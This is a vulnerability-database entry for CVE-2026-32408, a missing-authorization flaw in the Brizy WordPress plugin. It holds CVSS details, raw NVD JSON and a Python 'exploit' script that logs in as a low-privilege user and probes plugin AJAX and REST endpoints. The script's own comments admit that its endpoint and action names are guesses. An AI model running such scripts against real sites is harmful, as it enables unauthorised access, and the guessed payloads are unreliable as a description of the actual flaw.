Security Vulnerability Report
中文
CVE-2026-32408 CVSS 4.3 MEDIUM

CVE-2026-32408

Published: 2026-03-13 19:54:57
Last Modified: 2026-04-29 10:17:07

Description

Missing Authorization vulnerability in themefusecom Brizy brizy allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Brizy: from n/a through <= 2.7.23.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Brizy WordPress Plugin <= 2.7.23

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-32408 PoC - Brizy Plugin Broken Access Control # Target: WordPress site with Brizy plugin <= 2.7.23 # Attack Type: Missing Authorization / Broken Access Control import requests import sys TARGET_URL = "https://target-wordpress-site.com" USERNAME = "low_privilege_user" PASSWORD = "user_password" def get_wp_session(): """Authenticate and get WordPress session cookie""" session = requests.Session() login_url = f"{TARGET_URL}/wp-login.php" login_data = { 'log': USERNAME, 'pwd': PASSWORD, 'wp-submit': 'Log In', 'redirect_to': f"{TARGET_URL}/wp-admin/", 'testcookie': '1' } response = session.post(login_url, data=login_data) return session if 'wordpress_logged_in' in session.cookies else None def exploit_brizy_access_control(session): """ Exploit Brizy plugin broken access control vulnerability Target unprotected Brizy AJAX endpoints or admin functions """ # Common Brizy AJAX endpoints that may lack authorization vulnerable_endpoints = [ f"{TARGET_URL}/wp-admin/admin-ajax.php", f"{TARGET_URL}/wp-json/brizy/v1/" ] # Example payload for accessing admin functionality # The actual exploit depends on specific vulnerable endpoint exploit_payloads = [ { 'action': 'brizy_admin_api', 'method': 'get_pages', 'data': {} }, { 'action': 'brizy_editor_ajax', 'sub_action': 'get_config', 'post_id': '1' } ] print("[*] Attempting to exploit Brizy broken access control...") for endpoint in vulnerable_endpoints: for payload in exploit_payloads: try: if 'admin-ajax' in endpoint: response = session.post(endpoint, data=payload, timeout=10) else: response = session.get(endpoint, params=payload, timeout=10) if response.status_code == 200: print(f"[!] Potential vulnerable endpoint found: {endpoint}") print(f"[*] Response preview: {response.text[:500]}") return True except requests.RequestException as e: print(f"[-] Request failed: {e}") continue return False def main(): print(f"[*] CVE-2026-32408 Brizy Plugin Exploit") print(f"[*] Target: {TARGET_URL}") session = get_wp_session() if not session: print("[-] Authentication failed") sys.exit(1) print("[+] Successfully authenticated as low-privilege user") if exploit_brizy_access_control(session): print("[!] Access control vulnerability confirmed!") print("[*] Low-privilege user can access protected functionality") else: print("[-] Exploitation attempt completed, check manually") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32408", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:54:57.400", "lastModified": "2026-04-29T10:17:06.640", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in themefusecom Brizy brizy allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Brizy: from n/a through <= 2.7.23."}, {"lang": "es", "value": "Vulnerabilidad por falta de autorización en themefusecom Brizy brizy permite explotar niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Brizy: desde n/a hasta &lt;= 2.7.23."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/brizy/vulnerability/wordpress-brizy-plugin-2-7-23-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}